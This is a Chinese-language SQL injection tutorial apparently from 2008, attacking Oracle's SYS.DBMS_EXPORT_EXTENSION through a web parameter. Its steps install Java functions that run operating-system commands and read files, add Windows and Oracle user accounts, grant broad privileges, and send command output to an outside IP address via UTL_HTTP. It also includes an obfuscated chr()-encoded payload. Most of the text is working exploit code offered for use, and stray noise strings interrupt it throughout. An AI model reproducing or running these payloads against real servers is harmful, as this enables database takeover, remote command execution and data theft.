以下的演示都是在web上的sql plus执行的(此方法依赖 SYS.DBMS_EXPORT_EXTENSION 中已被 Oracle 后续补丁修复的注入缺陷,只对未打补丁的实例有效),在web注入时把 select SYS.DBMS_EXPORT_EXTENSION..... 改成
/xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....) + [+ {) [* o9 L' I+ t9 C
的形式即可。(用 'a'|| 拼接是为了让语句返回true值)
语句有点长,可能要用post提交。
以下是各个步骤:
1.创建包
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:
. y4 l& o' K% [$ W R! O/xxx.jsp?id=1 and '1'<>'a'||(
9 N! o) A2 P" j0 O( E$ n5 `$ l7 G- tselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''+ Z- o6 _$ i- G, _
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(6 J. y5 l% a. J$ j; h# x% s3 D; S
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}7 d, \, _6 ^# V$ h
}'''';END;'';END;--','SYS',0,'1',0) from dual 7 J" O7 R' q5 ^* D ?# k
) 0 m1 A. j' g" q9 v g8 P
------------------------
如果url有长度限制,可以把readFile()函数块去掉,即:
/xxx.jsp?id=1 and '1'<>'a'||( & n) F) J: U: T) O' J. M" l/ t; K
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''1 m4 u! A* p7 m
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader( J2 I- I) V$ F. z
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
3 ^8 R6 }4 A' Z' u0 _& `4 Z}'''';END;'';END;--','SYS',0,'1',0) from dual
& A- g" [* j4 I) % K' b; O) E5 P3 G. R: k) i# y
同时把后面步骤提到的对readFile()的处理语句去掉。
------------------------------
2.赋Java权限
! t( x; u# Z; n! H: ^" Iselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual
3.创建函数
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''" r" d9 K3 i1 W
create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual
: B6 B0 P" ^3 A( t. Y. C# xselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
& ]: w+ E) `$ o$ N3 a6 D$ w2 E. }. rcreate or replace function LinxReadFile(filename in varchar2) return varchar2 as language java name ''''''''LinxUtil.readFile(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual$ h. B, t" u ` {7 y
4.赋public执行函数的权限
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
0 S( q, P" ^2 m, e8 j* mselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual
5.测试上面的几步是否成功
3 T* _ h1 N$ m8 E/ yand '1'<>'11'||( $ [8 L4 d! \( o1 ^* T3 U
select OBJECT_ID from all_objects where object_name ='LINXRUNCMD' k: B1 n$ `2 B' S- G9 _
)
5 G: A" N- ?+ u' nand '1'<>(
\/ p. K0 V$ |& ]3 Iselect OBJECT_ID from all_objects where object_name ='LINXREADFILE' 1 q2 i/ m0 ^8 B& s* m' o+ J
)
6.执行命令:
9 j* a# m6 z G4 m/xxx.jsp?id=1 and '1'<>( 0 D- m/ Z' I0 F) N
select sys.LinxRunCMD('cmd /c net user linx /add') from dual
7 w. o; G; g& O! e S' z, p: P. E* W, R4 x" I
)
. H- y4 I8 S. m3 U0 W3 P3 T( ?$ m/xxx.jsp?id=1 and '1'<>(
6 q; h* `4 i$ P- Yselect sys.LinxReadFile('c:/boot.ini') from dual! p7 l! H- F% i3 A; n
. e" Q; W: H" |! D7 ?
)
0 E3 U. `! c- ?" _& J 7 C* ?6 H$ ^$ V! R
注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。
如果要查看运行结果可以用 union :
/xxx.jsp?id=1 union select sys.LinxRunCMD('cmd /c net user linx /add') from dual8 G" |1 v( F- t7 F* V' b
或者用 UTL_HTTP.request():
/xxx.jsp?id=1 and '1'<>( . I2 Q2 t O' `0 n3 p& C
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual) @# k, I, }& u# j2 W6 y( `1 q; q9 ?, l
) , w7 x' j% ?( D i" r- R) T8 ?
/xxx.jsp?id=1 and '1'<>(
# F3 a) n, K4 Y: ]0 `0 }6 r& VSELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual
0 l$ ?! O9 {3 R3 p)
+ x( V7 D4 W. x/ K+ o注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。* o" B4 }# u$ b$ a, M6 |
--------------------
6.内部变化
通过以下命令可以查看 all_objects 表的改变(事后排查时也可用它检查是否遗留了此类对象):
- w# Z3 e: f& h2 F- |+ f7 cselect * from all_objects where object_name like '%LINX%' or object_name like '%Linx%'- m5 {0 D/ v/ v- f
7.删除我们创建的函数
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''' C( E. z. Q# m) g
drop function LinxRunCMD '''';END;'';END;--','SYS',0,'1',0) from dual 0 A: m2 o3 D7 Y# M6 b0 |5 \
====================================================
全文结束。谨以此文赠与我的朋友。
linx 7 K- f. u8 a1 G; m
124829445 $ n6 s* |1 T, P4 L
2008.1.12
$ j/ b+ F1 n& ]3 e- O% Ylinyujian@bjfu.edu.cn * a# `* A9 O8 y' |( H) Z
====================================================================== % [* q9 U c4 X# h5 I4 y
测试漏洞的另一方法:
创建oracle帐号:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''' {- y5 @6 k3 J# p
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual/ a( {, v/ ^$ E4 {1 E; i
即:
8 R/ G( q7 V3 e$ Iselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),6 ]! x+ z- F, i
chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual * R9 a& r; g: b( X# s- e. _
确定漏洞存在:
1<>( ' ~3 d, t4 v. c6 }* e* [* `
select user_id from all_users where username='LINXSQL'
; y; B" P o0 p+ E3 o/ N) " p6 P$ Q+ |5 [) ]6 F; G) N
给linxsql连接权限:
& y* B$ J/ h( h' P q5 O$ _select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
: Q( Y2 w; [3 L" r7 E; N8 _GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual $ {$ K- s6 S" F! G, m) p, i! d
删除帐号:
: c2 z1 |% C/ D% r8 n2 `select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''# h0 D3 T4 I2 L8 `5 b( H4 Y
drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
======================
以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用的话可以考虑grant dba to 当前的User:
. L. W- F: v; V" w1.jsp?id=1 and '1'<>( 9 l7 o8 R) g0 Q' R$ C$ o' m
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''1 P; \9 H" {/ E% H
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1; end; '''';END;'';END;--','SYS',0,'1',0) from dual
0 I" m& E6 y9 f1 ?) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE6 C7 @9 y+ F/ A# z& D
)
7 U7 j+ T* N; v% x, B* ?1 {5 A! O0 l6 e, E: p+ @5 B, u
1 k5 e E0 j( _$ s5 z
% i+ _; V: n3 ?5 ^* U# T% s* z |